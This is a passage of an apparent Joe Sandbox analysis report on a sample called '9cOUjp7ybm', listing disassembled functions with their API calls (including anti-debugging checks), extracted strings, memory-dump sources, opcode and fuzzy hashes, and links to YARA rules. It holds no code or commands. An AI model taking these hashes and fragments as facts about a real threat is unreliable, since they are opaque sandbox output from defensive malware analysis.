Instruction ID: 6d1a9f278a1fefb882c75c8d90085aa5fcfc9254283b165b00bf3d4e3d707324
Opcode Fuzzy Hash: 401bd02b3709007dc62e50fab7b7cbf6922167914f7ea556e1413b673c6c5c6e
Instruction Fuzzy Hash: 1F21A172D09629BBCB218E65C840EAF3A79EB85BDCB314119FC1457F10D7398D619BE0

Function 6CE1F9E1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CE1FA2E

Part of subcall function 6CE1FEAB: InitializeSListHead.KERNEL32(6CE7BF88,6CE1FA38,6CE2F0D8,00000010,6CE1F9C9,?,?,?,6CE1FBF1,?,00000001,?,?,00000001,?,6CE2F120), ref: 6CE1FEB0

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE1FA98

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 03e0bbf75e808b4a00b930440352e9d8844f2a8982a140ce6dd96bfa304418be
Instruction ID: 9e9afee2fd2907b28350fd4918e51bb5de2ffba381e393c3c68819148d872980
Opcode Fuzzy Hash: 03e0bbf75e808b4a00b930440352e9d8844f2a8982a140ce6dd96bfa304418be
Instruction Fuzzy Hash: 7221F072A8D2449ADB05ABB88811BDD37B09F0636CF38494ED54127FC2CB2E4019C6E5

Function 6CE2480D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CE24859
GetFileType.KERNELBASE(00000000), ref: 6CE2486B

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: f467c63b3478720105ce81a7a17b75a7daf36e5b9b9c8fa8e6d80d72a1e38d0e
Instruction ID: e3b3cdbf5ec14f74c3ce6abceedd9fef59763935b1b44a0b08b1a64cee15a80e
Opcode Fuzzy Hash: f467c63b3478720105ce81a7a17b75a7daf36e5b9b9c8fa8e6d80d72a1e38d0e
Instruction Fuzzy Hash: A41190726287D18AD7284E3E8884712BAF4E74723CB38071BF1B6C6AE1C27CD586C641

Function 6CE25070 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CE2509E
_free.LIBCMT ref: 6CE250C4

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 20f458ee84dff37c43d3be6232ae25790992d35b648e5c3aabd85c8569ac20b6
Instruction ID: 6f0ff5c6f6ec108992baf2fdfa345a8cd344834b27b21b709389d307d2b0dbd9
Opcode Fuzzy Hash: 20f458ee84dff37c43d3be6232ae25790992d35b648e5c3aabd85c8569ac20b6
Instruction Fuzzy Hash: 7811D371B022205BDB21EE6D9D46F5572B8A752B3CF38171AE521CABC4E378C64386D0

Function 6CE22DD6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CE229D9,00000001,00000364,00000013,000000FF,?,00000001,6CE22DC8,6CE22E59,?,?,6CE2206C), ref: 6CE22E17

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 83284ff35286037bc48aacb5b3113e831aa421809fc7b0288700a3534cef103e
Instruction ID: 94284614787aad01e392439422e9577b48a77de924e3d3b2f4b6a24f81c2fe29
Opcode Fuzzy Hash: 83284ff35286037bc48aacb5b3113e831aa421809fc7b0288700a3534cef103e
Instruction Fuzzy Hash: FDF05932626120A7EB131A26CC0CB8B3778DF5237CB344125E814AFA80CF6CD50196E5

Non-executed Functions

Function 6CE15540 Relevance: 9.9, Strings: 6, Instructions: 2431COMMON

Download Yara Rule

Strings

IOZ, xrefs: 6CE163A0
|f, xrefs: 6CE16341
~5 , xrefs: 6CE1629D
JSrR, xrefs: 6CE16B0F
JSrR, xrefs: 6CE16B90
~5 , xrefs: 6CE1633C

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: JSrR$JSrR$~5 $~5 $IOZ$|f
API String ID: 0-3809505917
Opcode ID: fe17b8734de73abb723d4c4f92eeed9eda889564c76b019c99449b44b29bffee
Instruction ID: 2d46ee98a7a49d0f3183b3eed405604e35f5a27d0c05e95553cf7137474e859b
Opcode Fuzzy Hash: fe17b8734de73abb723d4c4f92eeed9eda889564c76b019c99449b44b29bffee
Instruction Fuzzy Hash: 5003F176B592218FDB04CE3CC9D17C977F2AB47328F209159D429DBB91C6368A4ACF12

Function 00429390 Relevance: 9.5, Strings: 7, Instructions: 781COMMON

Download Yara Rule

Strings

2=, xrefs: 004297EC
YdB3, xrefs: 00429789
-X*^, xrefs: 00429715
adB3, xrefs: 004297B0
,\)B, xrefs: 004296E5
#fw, xrefs: 00429699
7, xrefs: 004294A8

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: #fw$,\)B$-X*^$2=$7$YdB3$adB3
API String ID: 0-2780812687
Opcode ID: 79c70f3de171f4b962685fecb4a6db868b02356db63634a51b506dd75daea30c
Instruction ID: e24c0d87933da341d50c242bfc2a7810bc6412661cd9066a88db6538aed54372
Opcode Fuzzy Hash: 79c70f3de171f4b962685fecb4a6db868b02356db63634a51b506dd75daea30c
Instruction Fuzzy Hash: 2342E172A083508BD714CF24D8807ABBBE2EFC5314F198A2DE5D59B391D778D806CB46

Function 0041B4F0 Relevance: 9.0, Strings: 7, Instructions: 266COMMON

Download Yara Rule

Strings

M~~l, xrefs: 0041B568
$;J$, xrefs: 0041B6D9
AANH, xrefs: 0041B55D
2[&%, xrefs: 0041B6CE
&, xrefs: 0041B51C
$O, xrefs: 0041B6EF
h, xrefs: 0041B6F9

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: &$$;J$$$O$2[&%$AANH$M~~l$h
API String ID: 0-1741070211
Opcode ID: 97cc7e1ae2337564fa2afce9ca616d04b7b310bea86d6f6aae1dbb0b95b2e415
Instruction ID: fec9a991b953ca35e28cebece1879da7d1c19186631334664b50e74ac1add9e2
Opcode Fuzzy Hash: 97cc7e1ae2337564fa2afce9ca616d04b7b310bea86d6f6aae1dbb0b95b2e415
Instruction Fuzzy Hash: F181A9B450D3918BD339CF2984A17EBBBE2EBD6304F18896DD4D94B382C7354449CB96

Function 6CE22B5A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE22C52
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE22C5C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE22C69

Strings

,TOl, xrefs: 6CE22B5C

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ,TOl
API String ID: 3906539128-2377915434
Opcode ID: 7b3768492a975a94cd76b954a92253495098128590f1eff604261307ab770fdf
Instruction ID: 70ca518ab61deb9acf1fe57f08923cf96972a64b64740009f5521c0028c59854
Opcode Fuzzy Hash: 7b3768492a975a94cd76b954a92253495098128590f1eff604261307ab770fdf
Instruction Fuzzy Hash: D631E67595122C9BCB21DF64D888BCCBBB8BF18314F6041DAE41CA7290E7349B858F44

Function 6CE201CA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE201D6
IsDebuggerPresent.KERNEL32 ref: 6CE202A2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE202C2
UnhandledExceptionFilter.KERNEL32(?), ref: 6CE202CC

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d5227f155d214591bbe25bbc5a4cde6a9bf1d29b41911954e855122b55f5741c
Instruction ID: 6b304dce6191fc7493cb05094320d2a972856c56340e3e2883d7e9feb1a3b47b
Opcode Fuzzy Hash: d5227f155d214591bbe25bbc5a4cde6a9bf1d29b41911954e855122b55f5741c
Instruction Fuzzy Hash: 3D31FB75D453589BDF10DFA4D989BCDBBB8BF08304F20419AE40DA7280EB755A89CF45

Function 6CE21955 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CE21954,?,00000001,?,?), ref: 6CE21977
TerminateProcess.KERNEL32(00000000,?,6CE21954,?,00000001,?,?), ref: 6CE2197E
ExitProcess.KERNEL32 ref: 6CE21990

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c50976e142a7cf7bc0e596d4688824c91d97fe26e2d11b1d9e3683abc939920c
Instruction ID: ff09abb0357fe6b972d8fffbcc5956cf6409f63552102cad9f05f87a6a51f38d
Opcode Fuzzy Hash: c50976e142a7cf7bc0e596d4688824c91d97fe26e2d11b1d9e3683abc939920c
Instruction Fuzzy Hash: 4CE08631140108EFCF126F90CD08FD87B79FF05249B200518F40986620CB3EDE46DB80

Function 0040B810 Relevance: 4.0, Strings: 3, Instructions: 237COMMON

Download Yara Rule

Strings

ddg, xrefs: 0040B9F0
f-./, xrefs: 0040B8E7
[)^+, xrefs: 0040B8DF

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: ddg$[)^+$f-./
API String ID: 0-1799054822
Opcode ID: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
Instruction ID: 4101ff7d359f92ea000f669f04f3d171384972b93ad59f4348ba5ae7dd4f9e43
Opcode Fuzzy Hash: 47f42eaa36760ffd118ac33e81c4a6798d9596c72952d786d850ec147c6d4cf5
Instruction Fuzzy Hash: 225146B6A183518BC724CF25C8806A7B7E1EFC6304F08997DE5D69B345E3788904CB9A

Function 6CE1ED30 Relevance: 3.4, Strings: 2, Instructions: 877COMMONLIBRARYCODE

Download Yara Rule

Strings

<8R, xrefs: 6CE1F880
<8R, xrefs: 6CE1F8F3

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: <8R$<8R
API String ID: 0-2827036536
Opcode ID: a179c3064f956497ef05194d646005700df9b90c313328b392dc6a0ae553c355
Instruction ID: 61cbda370fb60d43378d86ded3aaa734ae197c978d722e190c386d2c70c855b9
Opcode Fuzzy Hash: a179c3064f956497ef05194d646005700df9b90c313328b392dc6a0ae553c355
Instruction Fuzzy Hash: 3352DF72F482059FCB08DEBCC5953CD77F2AB47354F209215E425ABFA4D62A890ACF94

Function 003F56A0 Relevance: 3.3, Strings: 2, Instructions: 811COMMON

Download Yara Rule

Strings

0, xrefs: 003F5FDD
8, xrefs: 003F5FD5

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 0931c198f8df3bf366cf80e23fe6c6acebd54e40b88177d3ed5c1d0ae8ee3a29
Instruction ID: 5b0d9fdfc6fe1f90d905cf769bfb9305472576436b1898b21efd0e8dbe1931be
Opcode Fuzzy Hash: 0931c198f8df3bf366cf80e23fe6c6acebd54e40b88177d3ed5c1d0ae8ee3a29
Instruction Fuzzy Hash: C97256716087449FD715CF18C880BABBBE1BF98314F14891DFA898B392D775D948CB92

Function 6CE11010 Relevance: 3.1, Strings: 2, Instructions: 583COMMON

Download Yara Rule

Strings

~q4, xrefs: 6CE113BC
~q4, xrefs: 6CE1125F

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: ~q4$~q4
API String ID: 0-2985255961
Opcode ID: 9f0be09aba6db6db7a23a9557fde8f66b1644583daa519a8a712f0219ca95d3e
Instruction ID: acebad8db3aa8426c181707b19fdf9d9dcf29a57b645a408e9af83697dbcfb27
Opcode Fuzzy Hash: 9f0be09aba6db6db7a23a9557fde8f66b1644583daa519a8a712f0219ca95d3e
Instruction Fuzzy Hash: E312F876B492118FCF05CEBCC5D53DE7BF2AB6B324F206615C411EBB95C32A990A8B14

Function 6CE291E1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CE291DC,?,?,00000008,?,?,6CE28E74,00000000), ref: 6CE2940E

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 36c0988ed125768b3ce445d88f0f37b6f0a90d686d40a2bfe78d90b21a444e46
Instruction ID: b95e904d4d2b6e5746e5246724b83a82a55161ba3b961dd2b4bc0c7b93b4e867
Opcode Fuzzy Hash: 36c0988ed125768b3ce445d88f0f37b6f0a90d686d40a2bfe78d90b21a444e46
Instruction Fuzzy Hash: 30B11732611608CFD705CF28C486B957BB0FF46368F359658E8A9CF6A1C339E992CB40

Function 6CE20398 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CE203AE

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 9f7b51b3e352bec7ae93c6862ed2012d484a289ff1fb450e1c683e4fb90832f4
Instruction ID: 433929c71208786e97024f6930106783b29a89e5d1fb30f4d72b8349863d94aa
Opcode Fuzzy Hash: 9f7b51b3e352bec7ae93c6862ed2012d484a289ff1fb450e1c683e4fb90832f4
Instruction Fuzzy Hash: 3F517EB1E016598BDB19CF55C8A27AABBF0FB49718F30C52AD415EB781E3789940CF60

Function 0040DB20 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 0040DBEB

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 47bc48253749bbccd36387d678e271a442dd4bf92590558d95ae7ed48be474bc
Instruction ID: 1d90e042c8be6680e10f875c0be03913eff272a3064b354bfec0ab6573eb9ef8
Opcode Fuzzy Hash: 47bc48253749bbccd36387d678e271a442dd4bf92590558d95ae7ed48be474bc
Instruction Fuzzy Hash: 18813D729042614FCB12CE68884076BBBD1AF85324F19C67EECB99B3D2D6389C09D7D1

Function 00431480 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

@, xrefs: 00431531

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1f87492e51453d5fe3f1d6a171d31c5fdddc7a98d4d73065cb900f3d66267ecf
Instruction ID: 792e727f066091c40aad5b74fac4d781b286cf86cc37c4abeb73b12951271c83
Opcode Fuzzy Hash: 1f87492e51453d5fe3f1d6a171d31c5fdddc7a98d4d73065cb900f3d66267ecf
Instruction Fuzzy Hash: 4E3125709043009BDB14CF28D88167B77F4FF99328F10962DE99A5B3A1E7399D04C786

Function 6CE2473C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CE2473C

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e4d849900cf55eedb229df51970abf7722519f59a44c1bb736ac2b9806442cff
Instruction ID: af6c385cf67d281e1a60092b934cd57dacd4cf448fd903c2965ac95143d19ee0
Opcode Fuzzy Hash: e4d849900cf55eedb229df51970abf7722519f59a44c1bb736ac2b9806442cff
Instruction Fuzzy Hash: B4A022B0300200CF8F00CF30828830C3BFCAB032E030A8038A808C2000FB3880E0EBA2

Function 0040F7C0 Relevance: .8, Instructions: 753COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2edcc9d8116daa6f1658d0883bdfb60c774d0e31ba6f87bbfce6ed58941d108
Instruction ID: 647c0d7e3a9c583d7f4fc23804f149cc2302c00f21833394c95a094af90f49a4
Opcode Fuzzy Hash: e2edcc9d8116daa6f1658d0883bdfb60c774d0e31ba6f87bbfce6ed58941d108
Instruction Fuzzy Hash: 39727CB0609F808FD3658F3C8845797BFD6AB5A324F188B5DA0FA873D2C77561018B66

Function 003F7140 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4aa2f900580760132ca230ffb94d44d2c1a1fdd6534b89ff778f90ef61833bf
Instruction ID: 55adf0620eac41d47d57aa59a4e73f2f5626fb508b16532ad6848ac217ac6f8c
Opcode Fuzzy Hash: b4aa2f900580760132ca230ffb94d44d2c1a1fdd6534b89ff778f90ef61833bf
Instruction Fuzzy Hash: 9252B67090CB889FE736CF24C4847B7BBE1AB52314F15492EC6EB46B82C379A985C751

Function 003F39B0 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39063f267de1c4b7ad7c4dae0f3436c6d00b5b9179a226d4e1be1e4f4f8738be
Instruction ID: 30732e5df9065963e374d484d671d2adf9c2b53723888bda713ab8680abf18b7
Opcode Fuzzy Hash: 39063f267de1c4b7ad7c4dae0f3436c6d00b5b9179a226d4e1be1e4f4f8738be
Instruction Fuzzy Hash: 9652D2315083498FCB16CF29C0906BABBE1FF88314F198A6DF99957352D774E989CB81

Function 003F7F20 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
Instruction ID: 8667850e15a2a2a2ff84822100bfef2c2b82599dcfab97f6c5a77f1dc9c924aa
Opcode Fuzzy Hash: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
Instruction Fuzzy Hash: 1E22D7366087158BC72ADF18D8806BBB3E5FFC4315F19892DDAC697385DB34E8158B42

Function 003F43B0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

